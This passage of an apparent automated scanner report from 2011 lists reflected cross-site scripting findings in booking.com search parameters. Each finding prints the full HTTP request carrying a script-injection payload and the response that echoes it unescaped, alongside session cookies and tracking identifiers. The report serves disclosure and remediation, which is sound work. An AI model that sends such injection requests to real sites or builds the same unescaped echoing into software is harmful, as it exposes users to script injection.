Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:10 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR0kCPIILsWbZor2CD1FfGdefKUJXrZ4LhRultf9wi7%2BBa4wA0Xe8rEPXdTrlS%2FC0RK7AO5KfnttTKjvmtmvVwWpdPdWObiTxe4HCNrATsB%2BO94lOYlLkRFNr70z1Ak%2BQv0QrAV%2BxSnxb3kGHQ9RQAyC5eEO4DoEW5qabbtFoys%2B5YUzPOF0G4ywfhPoLkxs4o6siwicUER1s%2B7m3%2F3T28oSg5ZBm7%2FhJVDniS3vYikVDGMQHZaaLz5%2BX4tWdffY3u0pGx73WGbA0lO7sz%2FHSfljBz4lzoeTyeQ7eaQAu4O0X0wHNgjA2ARPQqRA7DqUSkQKi34Qt%2Big81Y%2BrcUjsnjLojuflJVjXQuTZxYrFh%2FtXnS7d%2FKMT7sWqIrBjfmGyQCnWEWAWe74XOnHMcAjnMhOkuw7rBe%2BN0D5hfSIa4oHjmHGdizMwGD139%2BCnqkhLRWPcYO%2F5sGp%2FLMXs93Jq7oM%2BYMSTh6as7RQicH7PWVk8AxV%2B5vvq%2FaD8082Ulv5kFO6HBvHALEvlDB%2BSs09p%2F8loH349D0eBNpYfBmvcvJxaik4Mqa1tGGxeEiQUk2Lrswnx64Eh4TSwXGFJW5IpQtLpktpVz05EapxtC474y8Xte%2BxGL1gzHlMbqweb1cQwcQGaALgdI39SeZfFBIs%2FPqLCkNHDQ5Cgb6nJIEGJxVZT27hW4%2BXYa9CwMh4NXXED3JwBCJHvT2lpOrU8qrkK%2ByfUXXlyw5lGKLsS09A0jiJSb%2FTWV5Id79DmQzsRRafZGDwjphRp9NmpzyRoFczXiiKRJR0Zm0ECjOUo5O7NUhUaTw9%2BV7MuycYaFvNK4rED87aIuVp1nA4vRFppbUSxT0asrvJfGgcsYPrGZiYAKqTl8qDWb%2BRuqwZ3gN%2FhqNoRFXpsM6NQi7TBRe1BNby8JPgdFRYGPRchTeOiESe%2F2u0eOOz%2FhyvBV9hqc2amYf%2B7pKrPKSFiL9j62XsJSynfZADZODPZqgAfeQe0%2B1n%2FM3Nf%2FgXB2BfpDoMfTAoIXDD%2B2zpy1GZ0aKfwZc5%2Btcf%2FnLwKHqtMoQWHQCny%2BLQ8EM%2FsU01FuSaI2gM%2BiQ5sg54OYuaxZ15EAnq9CpJ%2F6kJL5%2BWEJyqIWgXDcRuVTekXmEZ2Gtr02eUbrpR5Qe2aVzyX53tikhW9K1dkSfDqOK%2FewU80i%2FeTqzN29f5FnjAG%2FZK%2BE1MCQqvUQV%2F6wHpA1VptLqcCLY4vCZRVcs6QMCMMb025k0Fgh2fhN4wYgSRshaCiuAa%2FlzK%2Bfk%2FAQl%2FxDc24ACcyUL2Sn0whzY3aJgNuYdGp457tXZ626rLcHf744BVF5YVIHoheUTNsVr0zV4EqnvNWYYjI8dmLiaCU3KkgcWyjoIwoil3eDWhSlTu6Y2tU4SdXYLLw1rX8JBf3N8On%2BAfJaOp%2FVTWXzOTYo0QiQWSQfwIBNi7aiA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:20:11 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 276908
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
k : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10a4609</script><script>alert(1)</script>364dfd52e62&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_url : '/searchresults.en-us.html?aid=335591;labe
...[SNIP]...

4.215. http://www.booking.com/searchresults.html [checkin_year_month parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkin_year_month request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bff"><script>alert(1)</script>baf172468a was submitted in the checkin_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10f3bff"><script>alert(1)</script>baf172468a&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:52 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5l%2FLffaPyJHXu4q2%2BdoR5Iz0oavHU2rGisCrR42YpPIjedvMSIvnPbufaWP5YiCyeKFOhfiPW1L2dsrmzNmkmplzXnm9y%2BhF11lYWw2HnoP5JmCp%2FP6bNuIQRCLLwramikxQrRTcScO0q%2FQb2CeYiov0Odn7qD%2FdE5my4OGedYO47IvhCyxJVSa101qzR5SKjnuKMgZJfVGl6m1Kl6wC%2F%2FvEGchgxQN8LbXGHagbI8Tqv1je1npYwGWKCocPKIfldPMuGUSMtgM54n6j21kukoIp14B7JCljJxsV5GryNeyG%2BaAsAWGlvQTE8487N69tLBosvMZEdiNdCCAUvfzNSiGnp%2Fm1TN9JhfxaRaGKeMNmLTVN4vnxJhhuPPSBpB%2FnP7innGo%2Ffqonjph8QVMf5LpBBI26UK%2FbdozyrZhp0Z7DBLE1Ik9l8p7GOFHE6jXLNsPZeTQSeRFxWg4UVsHT2DoDTfSM9MtnUiEOBKoTKdwFdhUJTRUkTX3VPYO9TpN%2F%2FNjRXKjaJrQuOPdViHN10jhta%2Bv2gVO%2FU%2F%2Fq%2BKW0%2BWHzaDhy7vcjDKAitEgB2i%2FFMdGE9cYOgDWnLV%2F0Ofbq1Pi91dq0GE3riH12e1Jq1AYuUcB1N2p8Z%2BRumfNHznEre7MbZjugWZl4Og%2FUVG6no7%2F6e1eAc3ei0eJ4ntzgF2vZRD1eQkhJyabtqG8GHEgx42UqFAsS6oYClL7Gh2LSGEkxlBBkB0T5gatTRevfQHi9nNYe5tsUA9mdeJXp6yntAOIHUVGYBV4%2BSvAeVnTdvw9lbNnw%2FeG6J25ZgflZyhW8fa69VwbR7QdD76tTmu5dDmRXWQ%2BjDxiaqpLZTCzTZ2lq2LHE%2Fx2nnRH2SGQUY4FEVnWyWl8%2BR0Uh1c2lAN56yNkD0e38RN8hXSeeVDhdxvDM%2FYtTQx%2B0MSiEcweAlkR0BlD6AvFmJNvuQPbLaOMafcB%2Bl89J6jlTn02QuI%2B0Dp0C%2BEos%2BDEC7da293k49UabVZdVPEiQkUsvxP7oicqn%2B90nYxIqdMp6hK%2BTp6eyJ%2FK7UONqCUxMytL96ojNyE7ZY2YI6%2Bnxkdlv2vTIzHbOOo2fQwfryxbaX0u3fDYP%2F33FGi7fppwfbzj8DiVSHCOe8qtaAVMWv2el3thWW5aCNAEHE9OZ5l4ZhV2g98I3LVyG78zSKGv7yM%2BlF9i637ijsYMd%2B2CIyZw%2F1aJeAT3Gw5CeKnVDkQtCbyU%2B9Ejar4R%2FzsKRxAG%2FFWkpjpYk2XV0tH%2BRynnHnPUktTxSu1J4jBrlQBkRZzbwQaS68DHP6UnQrSv5IF3gchRRpfMR9WPBMPgZ9XI1N%2FHZXt1NN6GfV8VGdKnW%2BHA4Jce7GCm8fCTVRA7mYEF7Yl9a2iLjnu8ORQJ%2F9jPkAus1yAwrIpMiihqxLzcsbnf3VvqADIyR4ZVwZ4fMTWE%2BtFOXYPCO8SQRmaicvBOZqOQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:18:52 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 277061
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
s://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10f3bff"><script>alert(1)</script>baf172468a&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...

4.216. http://www.booking.com/searchresults.html [checkout_monthday parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkout_monthday request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bb98</script><script>alert(1)</script>b608cf5487c was submitted in the checkout_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=077bb98</script><script>alert(1)</script>b608cf5487c&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:00 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5F%2B8LyEAy9%2BENkbBkfkD3xhmWaR2GVCPzzKfUTiby6MVy7BO30HJ3O9pLiRU%2BmjHeEQw7IVRPh%2BJlCBA6Rg9LeHlyVInUowzj92f0uZRiZ3zREWkxGzzctCPIkvIgmCBgVE7HG2EUgxqaaYsBnRjvOFNwJnK1E10WP98kj12MLYEpA2qGv7iIHej9tJ6yq4lrodaa0LgjERYrKGSiuk4pzNPhT81Tb05jjgaoOpX%2Be1G74P%2BI8qLRNm3n%2FfBjZ63vqR5Klv3HnK%2Fu10sz3AILCjNTqYk2GbEogMX3Q7BZxqjZu%2BRa%2BsIS7Z74wEjXDgFdTq3WzZ31Pvm%2FF7BoFfo%2BkL1UEStqg%2BFXgeFPtcdhqwSwzvUCe4dloObgBvuf56hTXCikBWZxZESOalIIMPtA3u8ry1t37PWvOJdj9O9dT1XPU4hVo6PE8%2BI6WxJcLAxgaa%2BBB8qRL0pmnmV73%2B1TUNGxc5enITyYDEMasrT3HrzWfSbn2Xt%2BjZwsbfrmcCtBNsJpJYFUU1w1bedldOMeVR3BXgA8lDkcYo8K%2FTTYAIyHA0Lsr09JokMs5ALka3cQtZCNMuO2EFyV2kAt7hIOEbQmvxb55DcpxZNcbN1VtSBNRsoejhBAgGxzOLIkGWSz4Hyr3t6XtOJZa6%2F1qllBOMABsviYeA3G35Ecky4fNVtZ33zbF7AVwZRd7n6nLw6YHE32227sh4B8VL2i41%2BDzYJNeuIuTxxrSvxp7VDQFXzlDkv4rcaDsR%2FBLPM1tTG8JOBPE6Q2%2BxU7i5NDdLLAVjGlI%2B0bpLrragF5REg29Fp6lh2ElQnuo3mKbUfvDT%2BtfFYjmRZI2yz7UtbRIxrZmngAKoSXVyb7ive7rxYiZkIxQZUh0BPJ1OUFIKcmT5hpooSTJLq38TYlNLr7QWdAF7YF%2BQti%2BFeMXefR3pMO2U7eF%2F0tLMmmZqJdDJaglUgp0r64jc6mfRyB14Dxm%2B5dd%2BOOOAaaEpgpeoBQVy0EsQRQVv8ydRCv2fzE%2FApk%2BEFcHYMmMmiXesyKPBDoPSOCrBTpeA2RJlHnuTPu9KnWmE1sUS7lal1ZhPj0ruyxACkRlb1Dnk2saemzYg2PHnns7V%2BNdIUdFJlCKp8Ocs62mJjW19yGvZZ3j445lGhyLrnAqH9AbJJ5qIZ63XRTe%2Bq8oAYIfXLu5RT6XA1Nr520v69IfC8Ldh9lDRrY1mfvbdFBXbQZ%2BAL%2BrXRqPAtZrmVYfK%2BPou%2F%2BZ4e%2FpmMH%2Fgir%2Fy4vCXhSV%2FU7nbxLJsVBf1JVXay6ozBkqj34prs5hvCIA6Ed%2BGetDiYGMMwIVlQF27TLvqSaLePOcZ6BuV7%2BJ4veERMU6lMlOlcvOslEY6kXfyxdfC%2BOtfI%2BYgt1m%2Fs8tpO%2FiAP2R5J8mZYffBh9rSfdP%2FhnI6nzUdBn9sts8SphFb%2BRYNO3iIvfXzNHovWtnSs8j5FkC2pnYA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:21:00 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 267240
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
n_end : '.booking.com',
b_original_url : 'http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=077bb98</script><script>alert(1)</script>b608cf5487c&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_url : '/searchresults.en-us.html?aid=335591;label=ufi-P20061717;sid=9
...[SNIP]...

4.217. http://www.booking.com/searchresults.html [checkout_monthday parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkout_monthday request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b25ce"><script>alert(1)</script>ef94838552f was submitted in the checkout_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07b25ce"><script>alert(1)</script>ef94838552f&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:19 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5F%2B8LyEAy9%2BENkbBkfkD3xhmWaR2GVCPzzKfUTiby6MVy7BO30HJ3O9pLiRU%2BmjHeEQw7IVRPh%2BJlCBA6Rg9LeHlyVInUowzj92f0uZRiZ3zREWkxGzzctCPIkvIgmCBgVE7HG2EUgxqaaYsBnRjvOFNwJnK1E10WP98kj12MLYEpA2qGv7iIHej9tJ6yq4lrodaa0LgjERYrKGSiuk4pzNPhT81Tb05jjgaoOpX%2Be1G74P%2BI8qLRNm3n%2FfBjZ63vqR5Klv3HnK%2Fu10sz3AILCjNTqYk2GbEogMX3Q7BZxqjZu%2BRa%2BsIS7Z74wEjXDgFdTq3WzZ31Pvm%2FF7BoFfo%2BkL1UEStqg%2BFXgeFPtcdhqwSwzvUCe4dloObgBvuf56hTXCikBWZxZESOalIIMPtA3u8ry1t37PWvOJdj9O9dT1XPU4hVo6PE8%2BI6WxJcLAxgaa%2BBB8qRL0pmnmV73%2B1TUNGxc5enITyYDEMasrT3HrzWfSbn2Xt%2BjZwsbfrmcCtBNsJpJYFUU1w1bedldOMeVR3BXgA8lDkcYo8K%2FTTYAIyHA0Lsr09JokMs5ALka3cQtZCNMuO2EFyV2kAt7hIOEbQmvxb55DcpxZNcbN1VtSBNRsoejhBAgGxzOLIkGWSz4Hyr3t6XtOJZa6%2F1qllBOMABsviYeA3G35Ecky4fNVtZ33zbF7AVwZRd7n6nLw6YHE32227sh4B8VL2i41%2BDzYJNeuIuTxxrSvxp7VDQFXzlDkv4rcaDsR%2FBLPM1tTG8JOBPE6Q2%2BxU7i5NDdLLAVjGlI%2B0bpLrragF5REg29Fp6lh2ElQnuo3mKbUfvDT%2BtfFYjmRZI2yz7UtbRIxrZmngAKoSXVyb7ive7rxYiZkIxQZUh0BPJ1OUFIKcmT5hpooSTJLq38TYlNLr7QWdAF7YF%2BQti%2BFeMXefR3pMO2U7eF%2F0tLMmmZqJdDJaglUgp0r64jc6mfRyB14Dxm%2B5dd%2BOOOAaaEpgpeoBQVy0EsQRQVv8ydRCv2fzE%2FApk%2BEFcHYMmMmiXesyKPBDoPSOCrBTpeA2RJlHnuTPu9KnWmE1sUS7lal1ZhPj0ruyxACkRlb1Dnk2saemzYg2PHnns7V%2BNdIUdFJlCKp8Ocs62mJjW19yGvZZ3j445lGhyLrnAqH9AbJJ5qIZ63XRTe%2Bq8oAYIfXLu5RT6XA1Nr520v69IfC8Ldh9lDRrY1mfvbdFBXbQZ%2BAL%2BrXRqPAtZrmVYfK%2BPou%2F%2BZ4e%2FpmMH%2Fgir%2Fy4vCXhSV%2FU7nbxLJsVBf1JVXay6ozBkqj34prs5hvCIA75fTpA3DvwQ%2FidlvUr4nO0Wmqr2BWcJVidx0amQjZ5bgypmX%2BX49Fp0D0tWT0q60dD3Xk7DmsN86Hmq74oRKHieX7I5Mip7AVDp65CTOl%2FAiqBvpx%2FQYRe1HN42RJRGu27Hcr9v52E7YISkfl%2FLdINgkvPNWV8ndg%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:20:19 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 267221
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
m/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07b25ce"><script>alert(1)</script>ef94838552f&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...

4.218. http://www.booking.com/searchresults.html [checkout_year_month parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkout_year_month request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ffa6"><script>alert(1)</script>558c8ba7e66 was submitted in the checkout_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-104ffa6"><script>alert(1)</script>558c8ba7e66&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
